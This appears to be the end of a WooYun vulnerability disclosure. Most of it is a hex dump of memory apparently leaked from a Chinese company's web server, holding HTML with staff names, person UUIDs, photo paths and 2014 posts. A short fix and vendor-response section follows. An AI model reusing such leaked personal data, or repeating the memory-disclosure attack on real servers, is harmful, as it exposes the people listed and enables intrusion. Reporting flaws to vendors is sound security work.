  0380: 32 30 31 34 2D 37 2D 32 35 20 31 30 3A 30 30 3A  2014-7-25 10:00:
  03c0: 75 6D 2E 61 73 70 78 3F 70 65 72 73 6F 6E 69 64  um.aspx?personid
  0400: 22 49 6D 61 67 65 73 2F 50 65 72 73 6F 6E 73 2F  "Images/Persons/
  0440: 22 63 6F 6D 5F 69 6D 67 22 20 20 2F 3E 3C 2F 61  "com_img"  /></a
  0480: B7 E9 A1 BE 5D E7 BB 99 28 E7 8E 8B E5 A8 9C 29  ....]...(......)
  04c0: 69 76 20 63 6C 61 73 73 3D 22 74 6F 70 69 63 5F  iv class="topic_
  0500: 61 6D 65 22 3E 3C 64 69 76 3E 3C 61 20 68 72 65  ame"><div><a hre
  0540: 38 33 65 62 66 63 32 35 33 31 31 22 3E E9 BB 8E  83ebfc25311">...
  0580: 32 37 2D 34 38 65 31 2D 39 39 62 64 2D 64 38 33  27-48e1-99bd-d83
  05c0: 20 E5 8F 91 E8 A1 A8 3C 2F 73 70 61 6E 3E 3C 2F   ......</span></
  0600: 31 32 30 31 38 32 63 2D 33 66 32 37 2D 34 38 65  120182c-3f27-48e
  0640: 32 30 31 38 32 63 2D 33 66 32 37 2D 34 38 65 31  20182c-3f27-48e1
  0680: 64 69 76 20 63 6C 61 73 73 3D 22 74 6F 70 69 63  div class="topic
  06c0: 72 2F 3E 5E 5F 5E EF BC 8C E5 A4 A9 E4 BD BF E7  r/>^_^..........
  0700: 3E 3C 2F 64 69 76 3E 3C 2F 64 69 76 3E 3C 64 69  ></div></div><di
  0740: 22 41 6C 62 75 6D 2E 61 73 70 78 3F 70 65 72 73  "Album.aspx?pers
  0780: 9E 3C 2F 61 3E 20 3C 61 20 68 72 65 66 3D 22 41  .</a> <a href="A
  07c0: 66 63 32 35 33 31 31 22 3E 47 44 30 3C 2F 61 3E  fc25311">GD0</a>
  0800: 76 3E 3C 61 20 63 6C 61 73 73 3D 22 70 68 6F 74  v><a class="phot
  0840: 39 39 62 64 2D 64 38 33 65 62 66 63 32 35 33 31  99bd-d83ebfc2531
  0880: 39 62 64 2D 64 38 33 65 62 66 63 32 35 33 31 31  9bd-d83ebfc25311
  08c0: 22 3E 28 E9 BB 8E E9 9C 9E 29 E9 80 81 E4 BA 86  ">(......)......
  0900: E9 A1 BE EF BC 8C E7 94 9F E6 97 A5 E5 BF AB E4  ................
  0940: 63 6C 61 73 73 3D 22 74 6F 70 69 63 22 3E 3C 64  class="topic"><d
  0980: 69 64 3D 62 31 32 30 31 38 32 63 2D 33 66 32 37  id=b120182c-3f27
  09c0: 75 6D 2E 61 73 70 78 3F 70 65 72 73 6F 6E 69 64  um.aspx?personid
  0a00: 64 69 76 3E 3C 73 70 61 6E 3E 32 30 31 34 2D 37  div><span>2014-7
  0a40: 68 72 65 66 3D 22 41 6C 62 75 6D 2E 61 73 70 78  href="Album.aspx
  0a80: 3C 69 6D 67 20 73 72 63 3D 22 49 6D 61 67 65 73  <img src="Images
  0ac0: 67 22 20 63 6C 61 73 73 3D 22 63 6F 6D 5F 69 6D  g" class="com_im
  0b00: A9 E4 BD BF E7 9A 84 E7 9C B7 E9 A1 BE 5D E7 BB  .............]..
  0b40: 7E 3C 62 72 2F 3E 3C 2F 64 69 76 3E 3C 64 69 76  ~<br/></div><div
  0b80: 3C 64 69 76 20 20 63 6C 61 73 73 3D 22 6E 61 6D  <div  class="nam
  0bc0: 36 39 2D 34 32 63 37 2D 38 63 32 64 2D 62 36 66  69-42c7-8c2d-b6f
  0c00: 73 6F 6E 69 64 3D 62 62 35 62 37 38 64 61 2D 64  sonid=bb5b78da-d
  0c40: 73 70 61 6E 3E 32 30 31 34 2D 37 2D 32 35 20 39  span>2014-7-25 9
  0c80: 22 41 6C 62 75 6D 2E 61 73 70 78 3F 70 65 72 73  "Album.aspx?pers
  0cc0: 73 72 63 3D 22 49 6D 61 67 65 73 2F 50 65 72 73  src="Images/Pers
  0d00: 61 73 73 3D 22 63 6F 6D 5F 69 6D 67 22 20 20 2F  ass="com_img"  /
  0d40: BE 8E E6 89 8B E8 A2 8B 5D E7 BB 99 28 E7 8E 8B  ........]...(...
  0d80: 3C 64 69 76 20 63 6C 61 73 73 3D 22 74 6F 70 69  <div class="topi
  0dc0: 65 72 73 6F 6E 69 64 3D 38 35 66 63 62 38 30 62  ersonid=85fcb80b
  0e00: 72 65 66 3D 22 41 6C 62 75 6D 2E 61 73 70 78 3F  ref="Album.aspx?
  0e40: BA A7 E5 93 81 E9 83 A8 3C 2F 61 3E 3C 2F 64 69  ........</a></di
  0e80: 63 6C 61 73 73 3D 22 70 68 6F 74 6F 22 20 68 72  class="photo" hr
  0ec0: 64 36 33 65 32 61 61 37 37 61 34 38 22 3E 3C 69  d63e2aa77a48"><i
  0f00: 36 33 65 32 61 61 37 37 61 34 38 2E 6A 70 67 22  63e2aa77a48.jpg"
  0f40: 8E E9 87 91 E7 8F 82 29 E9 80 81 E4 BA 86 5B E7  .......)......[.
  0f80: 22 74 6F 70 69 63 5F 6C 22 3E 3C 2F 64 69 76 3E  "topic_l"></div>
  0fc0: 3E 3C 61 20 68 72 65 66 3D 22 41 6C 62 75 6D 2E  ><a href="Album.
  1000: 31 61 22 3E E6 B1 AA E7 9B 88 3C 2F 61 3E 20 3C  1a">......</a> <
  1040: 32 62 66 2D 63 30 31 63 61 61 35 30 35 32 31 61  2bf-c01caa50521a
  1080: 2D 32 35 20 39 3A 31 36 3A 30 31 20 E5 8F 91 E8  -25 9:16:01 ....
  10c0: 3F 70 65 72 73 6F 6E 69 64 3D 36 37 33 61 65 66  ?personid=673aef
  1100: 2F 50 65 72 73 6F 6E 73 2F 4E 6F 50 69 63 2E 70  /Persons/NoPic.p
  1140: 28 E6 B1 AA E7 9B 88 29 E9 80 81 E4 BA 86 5B E7  (......)......[.
  1180: 22 74 6F 70 69 63 5F 6C 22 3E 3C 2F 64 69 76 3E  "topic_l"></div>
  11c0: 3E 3C 61 20 68 72 65 66 3D 22 41 6C 62 75 6D 2E  ><a href="Album.
  1200: 31 61 22 3E E6 B1 AA E7 9B 88 3C 2F 61 3E 20 3C  1a">......</a> <
  1240: 32 62 66 2D 63 30 31 63 61 61 35 30 35 32 31 61  2bf-c01caa50521a
  1280: 2D 32 35 20 39 3A 31 35 3A 34 39 20 E5 8F 91 E8  -25 9:15:49 ....
  12c0: 3F 70 65 72 73 6F 6E 69 64 3D 36 37 33 61 65 66  ?personid=673aef
  1300: 2F 50 65 72 73 6F 6E 73 2F 4E 6F 50 69 63 2E 70  /Persons/NoPic.p
  1340: 28 E6 B1 AA E7 9B 88 29 E9 80 81 E4 BA 86 5B E7  (......)......[.
  1380: 70 69 63 5F 6C 22 3E 3C 2F 64 69 76 3E 3C 2F 64  pic_l"></div></d
  13c0: 20 68 72 65 66 3D 22 41 6C 62 75 6D 2E 61 73 70   href="Album.asp
  1400: 3E E5 8D 93 E9 9F AC 3C 2F 61 3E 20 3C 61 20 68  >......</a> <a h
  1440: 2D 33 34 35 65 30 64 30 35 32 38 32 31 22 3E E5  -345e0d052821">.
  1480: 20 32 31 3A 32 32 3A 31 34 20 E5 8F 91 E8 A1 A8   21:22:14 ......
  14c0: 65 72 73 6F 6E 69 64 3D 64 31 63 66 39 63 32 31  ersonid=d1cf9c21
  1500: 65 72 73 6F 6E 73 2F 64 31 63 66 39 63 32 31 2D  ersons/d1cf9c21-
  1540: 20 20 2F 3E 3C 2F 61 3E 3C 64 69 76 20 63 6C 61    /></a><div cla
  1580: E7 8E 89 E8 B4 A2 29 3C 62 72 2F 3E 68 61 70 70  ......)<br/>happ
  15c0: 3E 3C 2F 64 69 76 3E 3C 64 69 76 20 63 6C 61 73  ></div><div clas
  1600: 2E 61 73 70 78 3F 70 65 72 73 6F 6E 69 64 3D 64  .aspx?personid=d
  1640: 3C 61 20 68 72 65 66 3D 22 41 6C 62 75 6D 2E 61  <a href="Album.a
  1680: 31 22 3E E5 BA 94 E7 94 A8 E8 BD AF E4 BB B6 E7  1">.............
  16c0: 91 E8 A1 A8 3C 2F 73 70 61 6E 3E 3C 2F 64 69 76  ....</span></div
  1700: 39 63 32 31 2D 30 35 35 33 2D 34 39 39 33 2D 38  9c21-0553-4993-8
  1740: 63 32 31 2D 30 35 35 33 2D 34 39 39 33 2D 38 39  c21-0553-4993-89
  1780: 20 63 6C 61 73 73 3D 22 74 6F 70 69 63 5F 6D 22   class="topic_m"
  17c0: 68 61 70 70 79 20 62 69 72 74 68 64 61 79 21 3C  happy birthday!<
  1800: 63 6C 61 73 73 3D 22 74 6F 70 69 63 22 3E 3C 64  class="topic"><d
  1840: 69 64 3D 64 31 63 66 39 63 32 31 2D 30 35 35 33  id=d1cf9c21-0553
  1880: 75 6D 2E 61 73 70 78 3F 70 65 72 73 6F 6E 69 64  um.aspx?personid
  18c0: E4 BB B6 E7 A0 94 E5 8F 91 E4 B8 AD E5 BF 83 3C  ...............<
  1900: 2F 64 69 76 3E 3C 61 20 63 6C 61 73 73 3D 22 70  /div><a class="p
  1940: 39 33 2D 38 39 63 66 2D 33 34 35 65 30 64 30 35  93-89cf-345e0d05
  1980: 33 2D 38 39 63 66 2D 33 34 35 65 30 64 30 35 32  3-89cf-345e0d052
  19c0: 63 5F 6D 22 3E 28 E5 8D 93 E9 9F AC 29 E9 80 81  c_m">(......)...
  1a00: 61 79 21 3C 62 72 2F 3E 3C 2F 64 69 76 3E 3C 64  ay!<br/></div><d
  1a40: 22 3E 3C 64 69 76 20 20 63 6C 61 73 73 3D 22 6E  "><div  class="n
  1a80: 34 33 35 64 2D 34 33 66 31 2D 38 31 62 63 2D 64  435d-43f1-81bc-d
  1ac0: 65 72 73 6F 6E 69 64 3D 62 39 65 63 62 35 32 64  ersonid=b9ecb52d
  1b00: 3E 3C 73 70 61 6E 3E 32 30 31 34 2D 37 2D 32 34  ><span>2014-7-24
  1b40: 65 66 3D 22 41 6C 62 75 6D 2E 61 73 70 78 3F 70  ef="Album.aspx?p
  1b80: 6D 67 20 73 72 63 3D 22 49 6D 61 67 65 73 2F 50  mg src="Images/P
  1bc0: 20 63 6C 61 73 73 3D 22 63 6F 6D 5F 69 6D 67 22   class="com_img"
  1c00: 94 9F E6 97 A5 E8 9B 8B E7 B3 95 5D E7 BB 99 28  ...........]...(
  1c40: 3D 22 74 6F 70 69 63 5F 6C 22 3E 3C 2F 64 69 76  ="topic_l"></div
  1c80: 76 3E 3C 61 20 68 72 65 66 3D 22 41 6C 62 75 6D  v><a href="Album
  1cc0: 61 34 38 22 3E E6 9D 8E E9 87 91 E7 8F 82 3C 2F  a48">.........</
  1d00: 30 32 2D 39 39 64 36 2D 64 36 33 65 32 61 61 37  02-99d6-d63e2aa7
  1d40: 20 E5 8F 91 E8 A1 A8 3C 2F 73 70 61 6E 3E 3C 2F   ......</span></
  1d80: 35 66 63 62 38 30 62 2D 62 64 65 66 2D 34 63 30  5fcb80b-bdef-4c0
  1dc0: 66 63 62 38 30 62 2D 62 64 65 66 2D 34 63 30 32  fcb80b-bdef-4c02
  1e00: 64 69 76 20 63 6C 61 73 73 3D 22 74 6F 70 69 63  div class="topic
  1e40: 29 3C 62 72 2F 3E 3C 2F 64 69 76 3E 3C 64 69 76  )<br/></div><div
  1e80: 2F 64 69 76 3E 3C 21 2D 2D 65 6E 64 20 74 6F 64  /div><!--end tod
  1ec0: 74 22 3E 0D 0A 20 20 20 20 20 20 20 20 20 20 20  t">..
  1f00: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
  1f40: 73 70 61 6E 3E 31 32 37 3C 2F 73 70 61 6E 3E E4  span>127</span>.
  1f80: 6D 6D 65 6E 74 2E 61 73 70 78 3F 74 69 64 3D 32  mment.aspx?tid=2
  1fc0: 3C 74 65 78 74 61 72 65 61 20 63 6C 61 73 73 3D  <textarea class=
  2000: BA 94 3C 2F 74 65 78 74 61 72 65 61 3E 0D 0A 20  ..</textarea>..
  2040: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
  2080: 79 6C 65 3D 22 62 61 63 6B 67 72 6F 75 6E 64 3A  yle="background:
  20c0: 6E 22 20 6F 6E 63 6C 69 63 6B 3D 22 61 64 64 63  n" onclick="addc
  2100: 22 20 76 61 6C 75 65 3D 22 E6 8F 90 E4 BA A4 22  " value="......"
  2140: 3C 21 2D 2D 65 64 6E 20 63 6F 6E 5F 31 2D 2D 3E  <!--edn con_1-->
  2180: 0A 20 20 20 20 20 20 20 20 20 20 20 20 09 3C 75  .            .<u
  21c0: 22 6F 6E 22 3E 3C 61 20 68 72 65 66 3D 22 6A 61  "on"><a href="ja
  2200: 20 20 20 20 20 20 20 20 20 09 0D 0A 20 20 20 20           ...
  2240: 3B 22 20 73 74 79 6C 65 3D 22 77 69 64 74 68 3A  ;" style="width:
  2280: 81 E5 AF 84 E8 AF AD 3C 2F 73 70 61 6E 3E 3C 2F  .......</span></
  22c0: 61 76 2D 2D 3E 0D 0A 20 20 20 20 20 20 20 20 20  av-->..
  2300: 34 5F 63 6F 6E 22 20 69 64 3D 22 61 63 74 39 22  4_con" id="act9"
  2340: 6F 6D 2E 61 73 70 78 3F 69 64 3D 31 32 33 34 26  om.aspx?id=1234&
  2380: 3C 6C 69 3E 3C 61 20 68 72 65 66 3D 22 41 72 74  <li><a href="Art
  23c0: E6 8A A5 E3 80 8B 32 30 31 33 2D 30 37 2D 32 39  ......2013-07-29
  2400: 32 26 66 72 69 64 3D 30 22 3E E2 80 A2 20 E3 80  2&frid=0">... ..
  2440: 72 74 69 63 6C 65 57 69 74 68 43 6F 6D 2E 61 73  rticleWithCom.as
  2480: 30 37 3C 2F 61 3E 3C 2F 6C 69 3E 3C 61 20 63 6C  07</a></li><a cl
  24c0: 20 3E E6 9B B4 E5 A4 9A 3C 2F 61 3E 20 20 20 20   >......</a>
  2500: 20 20 20 20 20 20 3C 2F 75 6C 3E 0D 0A 20 20 20        </ul>..
  2540: 3D 22 63 6F 6E 34 5F 63 6F 6E 22 20 69 64 3D 22  ="con4_con" id="
  2580: 68 72 65 66 3D 22 41 72 74 69 63 6C 65 57 69 74  href="ArticleWit
  25c0: E6 9B B4 E5 A4 A7 E7 9A 84 E8 80 83 E9 AA 8C EF  ................
  2600: 31 36 39 26 66 72 69 64 3D 30 22 3E E2 80 A2 20  169&frid=0">...
  2640: E6 97 B6 E9 97 B4 E6 9B B4 E5 80 BC E9 92 B1 EF  ................
  2680: 31 31 31 26 66 72 69 64 3D 30 22 3E E2 80 A2 20  111&frid=0">...
  26c0: E4 B8 96 E7 95 8C E5 A4 A7 E6 88 98 E6 8E A5 E8  ................
  2700: 66 3D 22 41 72 74 69 63 6C 65 57 69 74 68 43 6F  f="ArticleWithCo
  2740: E3 80 91 E2 80 94 E2 80 94 39 E5 91 A8 E5 B9 B4  .........9......
  2780: 65 66 3D 22 41 63 74 69 76 65 4C 69 73 74 2E 61  ef="ActiveList.a
  27c0: 20 20 20 20 3C 2F 75 6C 3E 0D 0A 20 20 20 20 20      </ul>..
  2800: 76 3E 3C 21 2D 2D 65 6E 64 20 63 6F 6E 5F 34 2D  v><!--end con_4-
  2840: 20 63 6C 61 73 73 3D 22 63 6F 6E 5F 32 22 3E 0D   class="con_2">.
  2880: 09 3C 64 69 76 20 63 6C 61 73 73 3D 22 63 6F 6E  .<div class="con
  28c0: 5F 72 74 22 3E 3C 2F 64 69 76 3E 0D 0A 20 20 20  _rt"></div>..
  2900: 69 76 20 63 6C 61 73 73 3D 22 6A 6F 62 65 72 22  iv class="jober"
  2940: A4 9A 3C 2F 61 3E 3C 2F 64 69 76 3E 0D 0A 20 20  ..</a></div>..
  2980: 20 20 20 20 09 3C 64 69 76 20 63 6C 61 73 73 3D      .<div class=
  29c0: 73 3D 22 72 65 63 65 6E 74 5F 6A 6F 62 22 3E 0D  s="recent_job">.
  2a00: 3D 22 72 65 63 65 6E 74 65 6E 74 72 79 22 20 3E  ="recententry" >
  2a40: 20 20 20 20 20 20 3C 2F 64 69 76 3E 0D 0A 20 20        </div>..
  2a80: 0A 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20  .
  2ac0: 20 20 20 20 20 20 20 20 20 3C 64 69 76 20 63 6C           <div cl
  2b00: 70 78 22 3E E6 9B B4 E5 A4 9A 3C 2F 61 3E 3C 2F  px">......</a></
  2b40: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
  2b80: 20 20 20 3C 64 69 76 20 63 6C 61 73 73 3D 22 61     <div class="a
  2bc0: 68 6F 74 6F 22 3E 0D 0A 20 20 20 20 20 20 20 20  hoto">..
  2c00: 6F 6E 69 64 3D 35 62 61 32 32 36 33 36 2D 38 30  onid=5ba22636-80
  2c40: 73 72 63 3D 22 49 6D 61 67 65 73 2F 50 65 72 73  src="Images/Pers
  2c80: 61 73 73 3D 22 61 6C 6C 70 68 6F 74 6F 5F 69 6D  ass="allphoto_im
  2cc0: 38 30 36 63 2D 34 63 34 36 2D 61 63 35 32 2D 62  806c-4c46-ac52-b
  2d00: 73 70 78 3F 70 65 72 73 6F 6E 69 64 3D 31 66 38  spx?personid=1f8
  2d40: 6B 22 3E 3C 69 6D 67 20 73 72 63 3D 22 49 6D 61  k"><img src="Ima
  2d80: 2E 6A 70 67 22 20 63 6C 61 73 73 3D 22 61 6C 6C  .jpg" class="all
  2dc0: 66 38 30 36 37 33 65 2D 35 64 36 65 2D 34 37 36  f80673e-5d6e-476
  2e00: 22 41 6C 62 75 6D 2E 61 73 70 78 3F 70 65 72 73  "Album.aspx?pers
  2e40: 74 3D 22 5F 62 6C 61 6E 6B 22 3E 3C 69 6D 67 20  t="_blank"><img
  2e80: 30 37 62 61 33 32 66 62 2E 6A 70 67 22 20 63 6C  07ba32fb.jpg" cl
  2ec0: 72 73 6F 6E 69 64 3D 35 36 34 37 30 32 62 36 2D  rsonid=564702b6-
  2f00: 3C 61 20 68 72 65 66 3D 22 41 6C 62 75 6D 2E 61  <a href="Album.a
  2f40: 66 22 20 74 61 72 67 65 74 3D 22 5F 62 6C 61 6E  f" target="_blan
  2f80: 63 38 39 2D 31 39 61 64 30 66 62 37 63 61 33 66  c89-19ad0fb7ca3f
  2fc0: 2E 61 73 70 78 3F 70 65 72 73 6F 6E 69 64 3D 62  .aspx?personid=b
  3000: 61 3E 3C 2F 6C 69 3E 3C 6C 69 3E 3C 61 20 68 72  a></li><li><a hr
  3040: 30 37 30 32 37 31 32 61 62 37 63 66 22 20 74 61  0702712ab7cf" ta
  3080: 61 64 64 62 2D 34 38 31 62 2D 61 33 33 34 2D 30  addb-481b-a334-0
  30c0: 68 72 65 66 3D 22 41 6C 62 75 6D 2E 61 73 70 78  href="Album.aspx
  3100: E5 B4 94 E6 98 A5 E5 BF 83 3C 2F 61 3E 3C 2F 6C  .........</a></l
  3140: 2D 34 32 32 36 2D 39 33 39 64 2D 31 63 37 65 32  -4226-939d-1c7e2
  3180: 73 2F 63 63 32 36 31 64 37 63 2D 32 65 33 34 2D  s/cc261d7c-2e34-
  31c0: 20 20 2F 3E 3C 2F 61 3E 3C 61 20 68 72 65 66 3D    /></a><a href=
  3200: 65 32 32 36 35 34 32 33 64 22 3E E5 88 98 E4 BF  e2265423d">.....
  3240: 37 64 39 65 61 38 2D 62 32 63 62 2D 34 63 31 38  7d9ea8-b2cb-4c18
  3280: 61 67 65 73 2F 50 65 72 73 6F 6E 73 2F 37 38 37  ages/Persons/787
  32c0: 6C 70 68 6F 74 6F 5F 69 6D 67 22 20 20 2F 3E 3C  lphoto_img"  /><
  3300: 31 38 2D 61 35 37 63 2D 63 36 31 30 32 63 61 39  18-a57c-c6102ca9
  3340: 70 65 72 73 6F 6E 69 64 3D 61 64 66 39 38 31 31  personid=adf9811
  3380: 69 6D 67 20 73 72 63 3D 22 49 6D 61 67 65 73 2F  img src="Images/
  33c0: 22 20 63 6C 61 73 73 3D 22 61 6C 6C 70 68 6F 74  " class="allphot
  3400: 31 31 65 2D 37 36 62 62 2D 34 66 39 39 2D 62 30  11e-76bb-4f99-b0
  3440: 75 6D 2E 61 73 70 78 3F 70 65 72 73 6F 6E 69 64  um.aspx?personid
  3480: 62 6C 61 6E 6B 22 3E 3C 69 6D 67 20 73 72 63 3D  blank"><img src=
  34c0: 38 65 30 35 2E 6A 70 67 22 20 63 6C 61 73 73 3D  8e05.jpg" class=
  3500: 69 64 3D 34 34 62 30 33 65 39 31 2D 33 32 66 33  id=44b03e91-32f3
  3540: 61 20 68 72 65 66 3D 22 41 6C 62 75 6D 2E 61 73  a href="Album.as
  3580: 22 20 74 61 72 67 65 74 3D 22 5F 62 6C 61 6E 6B  " target="_blank
  35c0: 61 61 2D 31 38 61 35 65 31 30 66 65 63 64 37 2E  aa-18a5e10fecd7.
  3600: 61 73 70 78 3F 70 65 72 73 6F 6E 69 64 3D 34 35  aspx?personid=45
  3640: 3E 3C 2F 6C 69 3E 3C 6C 69 3E 3C 61 20 68 72 65  ></li><li><a hre
  3680: 62 39 61 38 38 32 37 37 30 61 36 22 20 74 61 72  b9a882770a6" tar
  36c0: 63 61 30 2D 34 66 63 36 2D 61 38 34 63 2D 38 62  ca0-4fc6-a84c-8b
  3700: 72 65 66 3D 22 41 6C 62 75 6D 2E 61 73 70 78 3F  ref="Album.aspx?
  3740: BB BB E6 A2 93 E6 B6 B5 3C 2F 61 3E 3C 2F 6C 69  ........</a></li
  3780: 34 66 33 30 2D 61 63 36 38 2D 64 62 35 38 37 30  4f30-ac68-db5870
  37c0: 2F 62 34 63 65 34 62 62 39 2D 39 61 35 30 2D 34  /b4ce4bb9-9a50-4
  3800: 20 2F 3E 3C 2F 61 3E 3C 61 20 68 72 65 66 3D 22   /></a><a href="
  3840: 37 30 36 31 36 33 63 38 22 3E E8 A2 81 E6 85 A7  706163c8">......
  3880: 34 33 30 63 35 2D 37 30 37 32 2D 34 38 32 36 2D  430c5-7072-4826-
  38c0: 67 65 73 2F 50 65 72 73 6F 6E 73 2F 62 33 64 34  ges/Persons/b3d4
  3900: 70 68 6F 74 6F 5F 69 6D 67 22 20 20 2F 3E 3C 2F  photo_img"  /></
  3940: 36 2D 39 39 38 66 2D 30 32 63 36 34 61 63 31 66  6-998f-02c64ac1f
  3980: 65 72 73 6F 6E 69 64 3D 62 61 63 62 32 64 37 31  ersonid=bacb2d71
  39c0: 6D 67 20 73 72 63 3D 22 49 6D 61 67 65 73 2F 50  mg src="Images/P
  3a00: 20 63 6C 61 73 73 3D 22 61 6C 6C 70 68 6F 74 6F   class="allphoto
  3a40: 37 31 2D 65 64 36 62 2D 34 33 63 66 2D 62 65 61  71-ed6b-43cf-bea
  3a80: 6C 62 75 6D 2E 61 73 70 78 3F 70 65 72 73 6F 6E  lbum.aspx?person
  3ac0: 22 5F 62 6C 61 6E 6B 22 3E 3C 69 6D 67 20 73 72  "_blank"><img sr
  3b00: 63 66 36 65 36 62 2E 6A 70 67 22 20 63 6C 61 73  cf6e6b.jpg" clas
  3b40: 6F 6E 69 64 3D 62 38 39 36 34 39 39 36 2D 39 63  onid=b8964996-9c
  3b80: 3E 3C 61 20 68 72 65 66 3D 22 41 6C 62 75 6D 2E  ><a href="Album.
  3bc0: 33 66 22 20 74 61 72 67 65 74 3D 22 5F 62 6C 61  3f" target="_bla
  3c00: 38 65 37 30 2D 30 39 34 34 64 30 64 34 32 38 33  8e70-0944d0d4283
  3c40: 6D 2E 61 73 70 78 3F 70 65 72 73 6F 6E 69 64 3D  m.aspx?personid=
  3c80: 3C 2F 6C 69 3E 3C 6C 69 3E 3C 61 20 68 72 65 66  </li><li><a href
  3cc0: 61 32 62 63 30 63 30 64 33 30 22 20 74 61 72 67  a2bc0c0d30" targ
  3d00: 35 33 2D 34 66 38 61 2D 38 38 39 36 2D 35 62 61  53-4f8a-8896-5ba
  3d40: 65 66 3D 22 41 6C 62 75 6D 2E 61 73 70 78 3F 70  ef="Album.aspx?p
  3d80: A8 E6 B3 BD E9 94 8B 3C 2F 61 3E 3C 2F 6C 69 3E  .......</a></li>
  3dc0: 33 63 35 2D 62 35 37 35 2D 32 35 62 65 39 61 66  3c5-b575-25be9af
  3e00: 37 32 34 63 63 62 31 37 2D 39 34 63 63 2D 34 33  724ccb17-94cc-43
  3e40: 2F 3E 3C 2F 61 3E 3C 61 20 68 72 65 66 3D 22 41  /></a><a href="A
  3e80: 61 66 33 36 63 33 33 22 3E E8 8C B9 E9 9B AA E8  af36c33">.......
  3ec0: 66 61 63 61 2D 31 32 65 64 2D 34 37 35 33 2D 39  faca-12ed-4753-9
  3f00: 65 73 2F 50 65 72 73 6F 6E 73 2F 31 30 36 39 66  es/Persons/1069f
  3f40: 68 6F 74 6F 5F 69 6D 67 22 20 20 2F 3E 3C 2F 61  hoto_img"  /></a
  3f80: 2D 39 30 36 35 2D 30 64 36 62 63 37 66 30 39 38  -9065-0d6bc7f098
  3fc0: 6E 69 64 3D 63 32 31 32 64 35 35 30 2D 62 39 66  nid=c212d550-b9f

修复方案:

打补丁!

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2014-09-29 10:55

厂商回复:

最新状态:

暂无